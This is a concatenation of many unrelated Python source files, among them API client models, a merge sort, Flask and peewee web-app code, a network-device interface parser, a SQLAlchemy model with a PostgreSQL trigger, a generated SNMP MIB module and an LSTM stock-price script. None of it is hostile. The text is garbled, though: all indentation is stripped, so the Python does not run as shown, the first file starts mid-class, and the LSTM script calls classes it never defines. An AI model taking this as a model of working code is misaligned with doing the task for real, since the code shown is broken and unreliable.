self.download_path = output_path
return self
class Artifact(Model):
id_field = 'artifactId'
base_uri = '/artifacts'
@property
def artifact_id(self):
return self._id
@property
def service_type(self):
return self.raw_json.get('serviceType')
@property
def artifact_type(self):
return self.raw_json.get('artifactType')
@property
def service_version(self):
return self.raw_json.get('serviceVersion')
@property
def parameters(self):
return self.raw_json.get('parameters')
@property
def dependencies(self):
return self.raw_json.get('dependencies')
class MultiComponentArtifact(Artifact):
def __init__(self, raw_json, client):
super(self.__class__, self).__init__(raw_json, client)
self.downloaded_components = {}
@property
def download_uri(self):
raise NotImplementedError(
'{} has no single download_uri; use download_component instead'.format(self.__class__.__name__))
@property
def components(self):
return self.raw_json.get('components', [])
def get_component_uri(self, component, validate=False):
uri = '{}/components/{}'.format(self.metadata_uri, component)
if validate:
if component not in self.refresh().components:
raise ValueError('{} has no component {}'.format(self, component))
return uri
def download_component(self, component, output_path, blocking=True, **kwargs):
component_uri = self.get_component_uri(component, validate=True) # fail early
if blocking:
self.refresh_until_ready(**kwargs)
self.client.download(component_uri, output_path)
self.downloaded_components[component] = output_path
return self
def _infer_file_type(filepath):
from os.path import splitext
_, ext = splitext(filepath)
if not ext:
raise ValueError('Cannot infer file_type for path {} with no extension'.format(filepath))
return ext[1:] # drop leading dot
class File(Model):
id_field = 'fileId'
base_uri = '/files'
@property
def file_id(self):
return self._id
@property
def file_type(self):
return self.raw_json.get('fileType')
@property
def signed_upload_url(self):
'''
Only exists between file.create and file.finalize calls; otherwise None
'''
return self.raw_json.get('signedUploadUrl')
@property
def s3_version_id(self):
'''
Only exists between file.upload and file.finalize calls; otherwise None
'''
return self.raw_json.get('s3VersionId')
def upload(self, path):
'''
Upload path to self.signed_upload_url and populate self.s3_version_id
'''
if self.signed_upload_url is None:
raise ValueError('Can\'t upload without signed_upload_url from create')
s3_version_id = self.client.upload(self.signed_upload_url, path)['s3VersionId']
self.raw_json['s3VersionId'] = s3_version_id
return self
def finalize(self):
'''
Finalize (PATCH) File and clear self.signed_upload_url and
self.s3_version_id
'''
if self.s3_version_id is None:
raise ValueError('Can\'t finalize without s3_version_id from upload')
self.raw_json = self.client.patch(self.metadata_uri, {'s3VersionId': self.s3_version_id})
return self
@classmethod
def from_local_path(cls, path, client, file_type=None):
'''
Factory method encapsulating the whole create/upload/finalize workflow
'''
file_type = file_type or _infer_file_type(path)
return cls({'fileType': file_type}, client).create().upload(path).finalize()
|
import multiprocessing
from .recursive_merge_sort import copy_merge as merge
from .recursive_merge_sort import recursive_merge_sort as merge_sort
def parallel_merge_sort(vector, count_slice=0, self_id=1, return_dict=None):
if return_dict == None:
manager = multiprocessing.Manager()
return_dict = manager.dict()
count_slice = multiprocessing.cpu_count()
self_id = 1
else:
pass
return_dict[self_id] = vector
if count_slice >= 2:
right_side_p = multiprocessing.Process(
target=parallel_merge_sort,
args=(
return_dict[self_id][len(return_dict[self_id])//2:],
count_slice-(count_slice//2),
(self_id*2)+1,
return_dict
)
)
right_side_p.start()
left_side = parallel_merge_sort(return_dict[self_id][:len(return_dict[self_id])//2], (count_slice//2), self_id*2, return_dict)
right_side_p.join()
return_dict[self_id] = merge(return_dict[self_id*2], return_dict[self_id*2+1])
else:
return_dict[self_id] = merge_sort(vector)
return return_dict[self_id]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
if os.path.exists('.env'):
# print('reading .env..')
for line in open('.env'):
var = line.strip().split('=')
if len(var) == 2:
os.environ[var[0]] = var[1]
from app import create_app, db
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
manager = Manager(app)
mc = MigrateCommand
manager.add_command('db', mc)
from manage_mercadopublico import MPCommand
manager.add_command('mp', MPCommand)
# from manage_test import TestCommand
# manager.add_command('test', TestCommand)
@mc.command
def drop_all(reflect=False):
"""
Custom drop_all
"""
if reflect:
db.reflect()
db.drop_all()
@mc.command
def create_all():
"""
Create all from sqlalchemy db
"""
db.create_all()
if __name__ == '__main__':
manager.run()
|
# Return the number of open edges on a sphere.
#
import pyvista
sphere = pyvista.Sphere()
sphere.n_open_edges
# Expected:
## 0
#
# Return the number of open edges on a plane.
#
plane = pyvista.Plane(i_resolution=1, j_resolution=1)
plane.n_open_edges
# Expected:
## 4
|
import datetime
from flask.ext.bcrypt import generate_password_hash
from flask.ext.login import UserMixin
from peewee import *
DATABASE = SqliteDatabase('journal.db')
class User(UserMixin, Model):
username = CharField(unique=True)
email = CharField(unique=True)
password = CharField(max_length=100)
join_date = DateTimeField(default=datetime.datetime.now)
is_admin = BooleanField(default=False)
class Meta:
database = DATABASE
order_by = ('-join_date',)
def get_posts(self):
return Post.select().where(Post.user == self)
def get_stream(self):
return Post.select().where(
(Post.user == self)
)
@classmethod
def create_user(cls, username, email, password, admin=False):
try:
with DATABASE.transaction():
cls.create(
username=username,
email=email,
password=generate_password_hash(password),
is_admin=admin)
except IntegrityError:
raise ValueError("User already exists")
class Post(Model):
title = CharField(max_length=50)
date = DateField()
time_spent = CharField(max_length=50)
learning = TextField()
resources = TextField()
timestamp = DateTimeField(default=datetime.datetime.now)
user = ForeignKeyField(
rel_model=User,
related_name='posts'
)
class Meta:
database = DATABASE
order_by = ('-date',)
@classmethod
def create_entry(cls, title, date, time_spent, learning,
resources, user):
with DATABASE.transaction():
cls.create(
title=title,
date=date,
time_spent=time_spent,
learning=learning,
resources=resources,
user=user,
)
def initialize():
DATABASE.connect()
DATABASE.create_tables([User, Post], safe=True)
DATABASE.close()
|
import sys
import logging
import getpass
import time
from irida_staramr_results import util
def user_credentials(username, password):
"""
Validates username and password inputted as arguments.
If either of the two are not specified the user will be prompted.
:param username: username of the IRIDA account
:param password: password of the IRIDA account
"""
if username is None:
username = input("Enter your IRIDA username: \n")
if password is None:
print("Enter your IRIDA password: ")
password = getpass.getpass()
return {"username": username,
"password": password}
def output_file_name(file_name):
"""
Validates name of the output file.
This expects only the name without the file extension. However, if specified, it will remove it.
:param file_name: name of output file
"""
if file_name.endswith(".xlsx"):
file_name = file_name[:-len(".xlsx")]
return file_name
def date_range(from_date, to_date):
"""
Sets up FROM and TO date values in unix timestamp (millisecond).
:param from_date:
:param to_date:
:return:
"""
if from_date is None:
from_date = 0 # if from_date is not specified as an argument, value will be the epoch time (1 January 1970 UTC)
else:
from_date = util.local_to_timestamp(from_date)
if to_date is None:
to_date = time.time() * 1000 # if to_date is not specified as an argument, value is the current timestamp
else:
to_date = util.local_to_timestamp(to_date)
# Ensure neither of the two are in the future.
if (to_date > time.time() * 1000) or (from_date > time.time() * 1000):
logging.error("DateError: --from_date and --to_date cannot be in the future.")
sys.exit(1)
# Ensure FROM is earlier than TO.
if from_date > to_date:
logging.error("DateError: --from_date must be earlier than --to_date.")
sys.exit(1)
# Add 24 hours (86400000 milliseconds) to include to_date's full day.
to_date = to_date + 86400000
return {"from_date": from_date, "to_date": to_date}
|
# ---------------------------------------------------------------------
# Ericsson.MINI_LINK.get_interfaces
# ---------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetinterfaces import IGetInterfaces
class Script(BaseScript):
name = "Ericsson.MINI_LINK.get_interfaces"
interface = IGetInterfaces
rx_port = re.compile(r"^Interface (?P<port>.+?)collisions \d+", re.MULTILINE | re.DOTALL)
rx_iface = re.compile(
r"^(?P<ifname>\S+)\s*\n"
r"^\s+Hardware is (?P<hw>\S+)(, address is (?P<mac>\S+))?\s*\n"
r"(^\s+Interface is unnumbered. Using IPv4 address of (?P<u_iface>\S+) \((?P<local_ip>\S+)\)\s*\n)?"
r"(^\s+Remote address: (?P<remote_ip>\S+)/32\s*\n)?"
r"^\s+index (?P<ifindex>\d+) metric \d+ mtu (?P<mtu>\d+).+\n"
r"^\s+<(?P<flags>\S+)>\s*\n",
re.MULTILINE,
)
rx_ipv4_address = re.compile(r"^\s+inet (?P<ip_address>\d+\S+/\d+)", re.MULTILINE)
def execute(self):
interfaces = []
v = self.cli_clean("show interface")
for p in self.rx_port.finditer(v):
match = self.rx_iface.search(p.group("port"))
i = {
"name": match.group("ifname"),
"type": self.profile.INTERFACE_TYPES.get(match.group("hw")),
"admin_status": "RUNNING" in match.group("flags"),
"oper_status": "UP," in match.group("flags"),
"enabled_protocols": [],
"snmp_ifindex": int(match.group("ifindex")),
"subinterfaces": [
{
"name": match.group("ifname"),
"admin_status": "RUNNING" in match.group("flags"),
"oper_status": "UP," in match.group("flags"),
"mtu": int(match.group("mtu")),
"snmp_ifindex": int(match.group("ifindex")),
"enabled_afi": [],
}
],
}
if match.group("mac"):
i["mac"] = match.group("mac")
i["subinterfaces"][0]["mac"] = match.group("mac")
if match.group("u_iface"):
i["subinterfaces"][0]["ip_unnumbered_subinterface"] = match.group("u_iface")
if match.group("local_ip") and match.group("remote_ip"):
i["subinterfaces"][0]["tunnel"] = {
"type": "PPP",
"local_address": match.group("local_ip"),
"remote_address": match.group("remote_ip"),
}
for match in self.rx_ipv4_address.finditer(p.group("port")):
if "IPv4" not in i["subinterfaces"][0]["enabled_afi"]:
i["subinterfaces"][0]["enabled_afi"] += ["IPv4"]
if "ipv4_addresses" not in i["subinterfaces"][0]:
i["subinterfaces"][0]["ipv4_addresses"] = []
i["subinterfaces"][0]["ipv4_addresses"] += [match.group("ip_address")]
interfaces += [i]
return [{"interfaces": interfaces}]
|
from civicboom.model.meta import Base, CacheChangeListener
from sqlalchemy import Column, ForeignKey
from sqlalchemy import String, Unicode, UnicodeText
from sqlalchemy import Integer, DateTime, Boolean
from sqlalchemy import func
from sqlalchemy.orm import relationship, backref
from sqlalchemy.schema import DDL
from cbutils.misc import now
import copy
class Message(Base):
__tablename__ = "message"
__mapper_args__ = {'extension': CacheChangeListener()}
id = Column(Integer(), primary_key=True)
source_id = Column(String(32), ForeignKey('member.id', onupdate="cascade"), nullable=True)
target_id = Column(String(32), ForeignKey('member.id', onupdate="cascade"), nullable=True, index=True)
timestamp = Column(DateTime(), nullable=False, default=now)
subject = Column(Unicode(), nullable=False)
content = Column(UnicodeText(), nullable=False)
read = Column(Boolean(), nullable=False, default=False)
target = relationship("Member", primaryjoin="Message.target_id==Member.id", backref=backref('messages_to' , cascade="all, delete-orphan"))
source = relationship("Member", primaryjoin="Message.source_id==Member.id", backref=backref('messages_from', cascade="all, delete-orphan"))
flags = relationship("FlaggedEntity" , backref=backref('offending_message'), cascade="all,delete-orphan")
__to_dict__ = copy.deepcopy(Base.__to_dict__)
__to_dict__.update({
'default': {
'id' : None ,
#'type' : lambda message: message.__type__(), # AllanC - the message type is based on who is observing it, a message could be 'sent' or 'to' depending on the viewing user. This adds complications # Now added to messages index
'source_id' : None ,
'target_id' : None ,
'timestamp' : None ,
'subject' : None ,
'content' : None ,
'read' : None ,
},
})
__to_dict__.update({
'full' : copy.deepcopy(__to_dict__['default']) ,
#'full+actions': copy.deepcopy(__to_dict__['default']) ,
})
__to_dict__['full'].update({
'source' : lambda message: message.source.to_dict() if message.source!=None else None ,
'source_name' : lambda message: str(message.source),
'target' : lambda message: message.target.to_dict() if message.target!=None else None ,
'target_name' : lambda message: str(message.target),
})
def __unicode__(self):
return "%s: %s" % (self.subject, self.content)
def __link__(self):
from civicboom.lib.web import url
return url('message', id=self.id, sub_domain='www', qualified=True)
def invalidate_cache(self, remove=False):
from civicboom.lib.cache import invalidate_message
invalidate_message(self, remove=remove)
def __type__(self, member=None):
"""
oh jesus, this is duplicated in the messages_index method as well as a post to_dict overlay
"""
try:
member = member.id
except:
pass
if not member:
return None
if self.source_id == member and self.target_id :
return 'sent'
if self.source_id == member and not self.target_id :
return 'public'
if self.source_id and self.target_id == member:
return 'to'
if not self.source_id and self.target_id == member:
return 'notification'
def delete(self):
from civicboom.lib.database.actions import del_message
return del_message(self)
def flag(self, **kargs):
"""
Flag message
"""
from civicboom.lib.database.actions import flag
flag(self, **kargs)
DDL('DROP TRIGGER IF EXISTS update_num_unread ON message').execute_at('before-drop', Message.__table__)
DDL("""
CREATE OR REPLACE FUNCTION update_num_unread() RETURNS TRIGGER AS $$
DECLARE
tmp_target_id text;
BEGIN
-- UPDATE changing the target ID should never happen
tmp_target_id := CASE WHEN TG_OP='DELETE' THEN OLD.target_id ELSE NEW.target_id END;
UPDATE member SET num_unread_messages = (
SELECT COUNT(message.id)
FROM message
WHERE
message.target_id=member.id AND
message.source_id IS NOT NULL AND
NOT message.read
) WHERE member.id = tmp_target_id;
UPDATE member SET num_unread_notifications = (
SELECT COUNT(message.id)
FROM message
WHERE
message.target_id=member.id AND
message.source_id IS NULL AND
NOT message.read
) WHERE member.id = tmp_target_id;
UPDATE member SET last_message_timestamp = (
SELECT timestamp
FROM message
WHERE
message.target_id=member.id AND
message.source_id IS NOT NULL
ORDER BY message.id DESC
LIMIT 1
) WHERE member.id = tmp_target_id;
UPDATE member SET last_notification_timestamp = (
SELECT timestamp
FROM message
WHERE
message.target_id=member.id AND
message.source_id IS NULL
ORDER BY message.id DESC
LIMIT 1
) WHERE member.id = tmp_target_id;
RETURN NULL;
END;
$$ LANGUAGE plpgsql;
CREATE TRIGGER update_num_unread
AFTER INSERT OR UPDATE OR DELETE ON message
FOR EACH ROW
EXECUTE PROCEDURE update_num_unread();
""").execute_at('after-create', Message.__table__)
|
"""
Command handler module for GMC
"""
import sys
import importlib
import os
from gmc.conf import ENVIRONMENT_VARIABLE
from gmc.conf import settings
def execute_from_command_line(argv=None, quiet=False):
"""
try to load a module specified in the given path.
Set GMC_SETTINGS_MODULE environment variable
"""
argv = argv or sys.argv[:]
if(len(argv) != 2) and not quiet:
print('Incorrect Usage of gmc-main command')
return
if os.path.exists(argv[1]):
module_file = os.path.basename(argv[1])
module_path = os.path.abspath(argv[1])
module_dir = os.path.dirname(module_path)
sys.path.append(module_dir)
module_name = module_file.split('.py')[0]
os.environ[ENVIRONMENT_VARIABLE] = module_name
else:
if not quiet:
print('Incorrect format for settings.py path')
if not quiet:
try:
print("Dataset Directory set to '%s'" % settings.DATASET_DIR)
print("Results Directory set to '%s'" % settings.BRAIN_DIR)
except AttributeError:
print('Could not load settings') |
from setuptools import setup, find_packages
setup(
name="rotten_tomatoes_client",
packages=find_packages(exclude=['tests*']),
install_requires=["requests"],
version="0.0.3",
description="Rotten Tomatoes Client",
author="Jae Bradley",
author_email="jae.b.bradley@gmail.com",
url="https://github.com/jaebradley/rotten_tomatoes_client",
download_url="https://github.com/jaebradley/rotten_tomatoes_client/tarball/0.1",
keywords=["rotten_tomatoes"],
classifiers=[],
)
|
#
# PySNMP MIB module CISCO-ST-TC (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-ST-TC
# Produced by pysmi-0.3.4 at Mon Apr 29 17:36:22 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint")
ciscoModules, = mibBuilder.importSymbols("CISCO-SMI", "ciscoModules")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibIdentifier, Bits, Counter32, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, NotificationType, ObjectIdentity, Unsigned32, ModuleIdentity, TimeTicks, Gauge32, Counter64, iso, IpAddress = mibBuilder.importSymbols("SNMPv2-SMI", "MibIdentifier", "Bits", "Counter32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "NotificationType", "ObjectIdentity", "Unsigned32", "ModuleIdentity", "TimeTicks", "Gauge32", "Counter64", "iso", "IpAddress")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
storageTextualConventions = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 12, 4))
storageTextualConventions.setRevisions(('2012-08-08 00:00', '2011-07-26 00:00', '2010-12-24 00:00', '2008-05-16 00:00', '2005-12-17 00:00', '2004-05-18 00:00', '2003-09-26 00:00', '2003-08-07 00:00', '2002-10-04 00:00', '2002-09-24 00:00',))
if mibBuilder.loadTexts: storageTextualConventions.setLastUpdated('201208080000Z')
if mibBuilder.loadTexts: storageTextualConventions.setOrganization('Cisco Systems, Inc.')
class VsanIndex(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 4094)
class DomainId(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 239)
class DomainIdOrZero(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 239)
class FcAddressId(TextualConvention, OctetString):
status = 'current'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(3, 3)
fixedLength = 3
class FcNameId(TextualConvention, OctetString):
reference = 'Fibre Channel Framing and Signaling (FC-FS) Rev 1.70 - Section 14 Name_Indentifier Formats.'
status = 'current'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(8, 8)
fixedLength = 8
class FcNameIdOrZero(TextualConvention, OctetString):
status = 'current'
subtypeSpec = OctetString.subtypeSpec + ConstraintsUnion(ValueSizeConstraint(0, 0), ValueSizeConstraint(8, 8), ValueSizeConstraint(16, 16), )
class FcClassOfServices(TextualConvention, Bits):
status = 'current'
namedValues = NamedValues(("classF", 0), ("class1", 1), ("class2", 2), ("class3", 3), ("class4", 4), ("class5", 5), ("class6", 6))
class FcPortTypes(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18))
namedValues = NamedValues(("auto", 1), ("fPort", 2), ("flPort", 3), ("ePort", 4), ("bPort", 5), ("fxPort", 6), ("sdPort", 7), ("tlPort", 8), ("nPort", 9), ("nlPort", 10), ("nxPort", 11), ("tePort", 12), ("fvPort", 13), ("portOperDown", 14), ("stPort", 15), ("npPort", 16), ("tfPort", 17), ("tnpPort", 18))
class FcPortTxTypes(TextualConvention, Integer32):
reference = 'IEEE Std 802.3-2005 carrier sense multiple access with collision detection (CSMA/CD) access method and physical layer specification.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12))
namedValues = NamedValues(("unknown", 1), ("longWaveLaser", 2), ("shortWaveLaser", 3), ("longWaveLaserCostReduced", 4), ("electrical", 5), ("tenGigBaseSr", 6), ("tenGigBaseLr", 7), ("tenGigBaseEr", 8), ("tenGigBaseLx4", 9), ("tenGigBaseSw", 10), ("tenGigBaseLw", 11), ("tenGigBaseEw", 12))
class FcPortModuleTypes(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20))
namedValues = NamedValues(("unknown", 1), ("other", 2), ("gbic", 3), ("embedded", 4), ("glm", 5), ("gbicWithSerialID", 6), ("gbicWithoutSerialID", 7), ("sfpWithSerialID", 8), ("sfpWithoutSerialID", 9), ("xfp", 10), ("x2Short", 11), ("x2Medium", 12), ("x2Tall", 13), ("xpakShort", 14), ("xpakMedium", 15), ("xpakTall", 16), ("xenpak", 17), ("sfpDwdm", 18), ("qsfp", 19), ("x2Dwdm", 20))
class FcIfSpeed(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11))
namedValues = NamedValues(("auto", 1), ("oneG", 2), ("twoG", 3), ("fourG", 4), ("autoMaxTwoG", 5), ("eightG", 6), ("autoMaxFourG", 7), ("tenG", 8), ("autoMaxEightG", 9), ("sixteenG", 10), ("autoMaxSixteenG", 11))
class PortMemberList(TextualConvention, OctetString):
status = 'current'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(0, 64)
class FcAddress(TextualConvention, OctetString):
status = 'current'
subtypeSpec = OctetString.subtypeSpec + ConstraintsUnion(ValueSizeConstraint(3, 3), ValueSizeConstraint(8, 8), )
class FcAddressType(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("wwn", 1), ("fcid", 2))
class InterfaceOperMode(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21))
namedValues = NamedValues(("auto", 1), ("fPort", 2), ("flPort", 3), ("ePort", 4), ("bPort", 5), ("fxPort", 6), ("sdPort", 7), ("tlPort", 8), ("nPort", 9), ("nlPort", 10), ("nxPort", 11), ("tePort", 12), ("fvPort", 13), ("portOperDown", 14), ("stPort", 15), ("mgmtPort", 16), ("ipsPort", 17), ("evPort", 18), ("npPort", 19), ("tfPort", 20), ("tnpPort", 21))
class FcIfServiceStateType(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("inService", 1), ("outOfService", 2))
class FcIfSfpDiagLevelType(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))
namedValues = NamedValues(("unknown", 1), ("normal", 2), ("lowWarning", 3), ("lowAlarm", 4), ("highWarning", 5), ("highAlarm", 6))
mibBuilder.exportSymbols("CISCO-ST-TC", PortMemberList=PortMemberList, FcIfSfpDiagLevelType=FcIfSfpDiagLevelType, DomainIdOrZero=DomainIdOrZero, storageTextualConventions=storageTextualConventions, PYSNMP_MODULE_ID=storageTextualConventions, FcPortTxTypes=FcPortTxTypes, FcAddressType=FcAddressType, FcIfSpeed=FcIfSpeed, FcNameId=FcNameId, FcIfServiceStateType=FcIfServiceStateType, VsanIndex=VsanIndex, FcAddressId=FcAddressId, FcPortModuleTypes=FcPortModuleTypes, FcClassOfServices=FcClassOfServices, DomainId=DomainId, InterfaceOperMode=InterfaceOperMode, FcNameIdOrZero=FcNameIdOrZero, FcPortTypes=FcPortTypes, FcAddress=FcAddress)
|
import matplotlib.pyplot as plt
plots_path = "./plots/"
def plot_points(x,y,xlabel,ylabel,filename):
plt.plot(x, y)
plt.ylabel(ylabel)
plt.xlabel(xlabel)
plt.savefig(plots_path+filename)
plt.close()
def cluster_purity(clusterer,data,classes,debug=False):
l = len(list(data))
no_of_clusters = clusterer.number_of_clusters
no_of_classes = len(set(classes))
confusion_matrix = [[0 for _ in range(no_of_classes)] for _ in range(no_of_clusters)]
for i in range(l):
# Getting cluster label
inst = data.get_instance(i)
# Getting actual class label
c = int(classes[i])
try:
cl = clusterer.cluster_instance(inst)
confusion_matrix[cl][c] += 1
except Exception as e:
continue
numer = 0
for cl in confusion_matrix:
numer += max(cl)
purity = float(numer)/l
if debug is True:
print confusion_matrix
return purity
|
# coding: utf8
from __future__ import unicode_literals
from .cli.info import info as cli_info
from .glossary import explain
from .about import __version__
from . import util
def load(name, **overrides):
depr_path = overrides.get('path')
if depr_path not in (True, False, None):
util.deprecated(
"As of spaCy v2.0, the keyword argument `path=` is deprecated. "
"You can now call spacy.load with the path as its first argument, "
"and the model's meta.json will be used to determine the language "
"to load. For example:\nnlp = spacy.load('{}')".format(depr_path),
'error')
return util.load_model(name, **overrides)
def blank(name, **kwargs):
LangClass = util.get_lang_class(name)
return LangClass(**kwargs)
def info(model=None, markdown=False):
return cli_info(model, markdown)
|
import os
from datetime import datetime
def list_sub_dirs(dir_path):
if not os.path.exists(dir_path):
raise RuntimeError("invalid dir path.")
if not os.path.isdir(dir_path):
raise RuntimeError("invalid dir path.")
sub_dirs = []
sub_files = os.listdir(dir_path)
for sub_file_name in sub_files:
sub_file_path = os.path.join(dir_path, sub_file_name)
if not os.path.isdir(sub_file_path):
continue
sub_dirs.append(sub_file_path)
return sub_dirs
def flatten_dir_path(dir_path):
sub_dirs = list_sub_dirs(dir_path)
for sub_dir_path in sub_dirs:
sub_sub_dirs = list_sub_dirs(sub_dir_path)
for sub_sub_dir_path in sub_sub_dirs:
sub_sub_dir_name = os.path.basename(sub_sub_dir_path)
target_dir_path = '_'.join([sub_dir_path, sub_sub_dir_name])
print(f"move: {sub_sub_dir_path} -> {target_dir_path}")
os.renames(sub_sub_dir_path, target_dir_path)
def create_dir(dir_path):
if not os.path.exists(dir_path):
os.makedirs(dir_path)
return dir_path
return create_dir(dir_path + "." + datetime.now().strftime("%Y%m%d%H%M%S"))
|
# https://blog.csdn.net/a19990412/article/details/85139058
# LSTM实现股票预测--pytorch版本【120+行代码】
'''
模型假设
我这里认为每天的沪深300的最高价格,是依赖于当天的前n天的沪深300的最高价。
然后用RNN的LSTM模型来估计(捕捉到时序信息)。
让模型学会用前n天的最高价,来判断当天的最高价。
'''
# depends
import pandas as pd
import matplotlib.pyplot as plt
import datetime
import torch
import torch.nn as nn
import numpy as np
from torch.utils.data import Dataset, DataLoader
## load data
def generate_df_affect_by_n_days(series, n, index=False):
if len(series) <= n:
raise Exception("The Length of series is %d, while affect by (n=%d)." % (len(series), n))
df = pd.DataFrame()
for i in range(n):
df['c%d' % i] = series.tolist()[i:-(n - i)]
df['y'] = series.tolist()[n:]
if index:
df.index = series.index[n:]
return df
def readData(column='high', n=30, all_too=True, index=False, train_end=-300):
df = pd.read_csv("sh.csv", index_col=0)
df.index = list(map(lambda x: datetime.datetime.strptime(x, "%Y-%m-%d"), df.index))
df_column = df[column].copy()
df_column_train, df_column_test = df_column[:train_end], df_column[train_end - n:]
df_generate_from_df_column_train = generate_df_affect_by_n_days(df_column_train, n, index=index)
if all_too:
return df_generate_from_df_column_train, df_column, df.index.tolist()
return df_generate_from_df_column_train
## params
n = 30
LR = 0.0001
EPOCH = 100
train_end = -500
## build
df, df_all, df_index = readData('high', n=n, train_end=train_end)
df_all = np.array(df_all.tolist())
plt.plot(df_index, df_all, label='real-data')
df_numpy = np.array(df)
df_numpy_mean = np.mean(df_numpy)
df_numpy_std = np.std(df_numpy)
df_numpy = (df_numpy - df_numpy_mean) / df_numpy_std
df_tensor = torch.Tensor(df_numpy)
trainset = TrainSet(df_tensor)
trainloader = DataLoader(trainset, batch_size=10, shuffle=True)
## train
rnn = RNN(n)
optimizer = torch.optim.Adam(rnn.parameters(), lr=LR) # optimize all cnn parameters
loss_func = nn.MSELoss()
for step in range(EPOCH):
for tx, ty in trainloader:
output = rnn(torch.unsqueeze(tx, dim=0))
loss = loss_func(torch.squeeze(output), ty)
optimizer.zero_grad() # clear gradients for this training step
loss.backward() # back propagation, compute gradients
optimizer.step()
print(step, loss)
if step % 10:
torch.save(rnn, 'rnn.pkl')
torch.save(rnn, 'rnn.pkl')
## output paint
generate_data_train = []
generate_data_test = []
test_index = len(df_all) + train_end
df_all_normal = (df_all - df_numpy_mean) / df_numpy_std
df_all_normal_tensor = torch.Tensor(df_all_normal)
for i in range(n, len(df_all)):
x = df_all_normal_tensor[i - n:i]
x = torch.unsqueeze(torch.unsqueeze(x, dim=0), dim=0)
y = rnn(x)
if i < test_index:
generate_data_train.append(torch.squeeze(y).detach().numpy() * df_numpy_std + df_numpy_mean)
else:
generate_data_test.append(torch.squeeze(y).detach().numpy() * df_numpy_std + df_numpy_mean)
plt.plot(df_index[n:train_end], generate_data_train, label='generate_train')
plt.plot(df_index[train_end:], generate_data_test, label='generate_test')
plt.legend()
plt.show()
|
import requests
from nose.plugins.attrib import attr
@attr('webservice')
def test_rest_api_responsive():
stmt_str = '{"statements": [{"sbo": "http://identifiers.org/sbo/SBO:0000526", "type": "Complex", "id": "acc6d47c-f622-41a4-8ae9-d7b0f3d24a2f", "members": [{"db_refs": {"TEXT": "MEK", "FPLX": "MEK"}, "name": "MEK"}, {"db_refs": {"TEXT": "ERK", "NCIT": "C26360", "FPLX": "ERK"}, "name": "ERK"}], "evidence": [{"text": "MEK binds ERK", "source_api": "trips"}]}]}'
url = 'http://api.indra.bio:8000/' + \
'assemblers/cyjs'
res = requests.post(url, stmt_str)
assert res.status_code == 200
|
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'includes': [
'auto_login_parser.gypi',
'components_tests.gypi',
'navigation_interception.gypi',
'visitedlink.gypi',
'web_contents_delegate_android.gypi',
],
}
|
"""Game Entities.
"""
class GamePlayer(object):
def __init__(self, symbol="", name="", team=0, loyalty=0, energy=0, score=0, active="ACTIVE", coord=(0, 0), speed=[]):
self.symbol = symbol
self.name = name
self.team = team
self.loyalty = loyalty
self.energy = energy
self.score = score
self.active = active
self.coord = coord
self.speed = speed
class GameStatus(object):
def __init__(self, name="", state="", size=0, map="", me=GamePlayer(), players=[], ratio='Q', rows=0, cols=0):
self.name = name
self.state = state
self.size = size
self.map = map
self.me = me
self.players = players
self.ratio = ratio
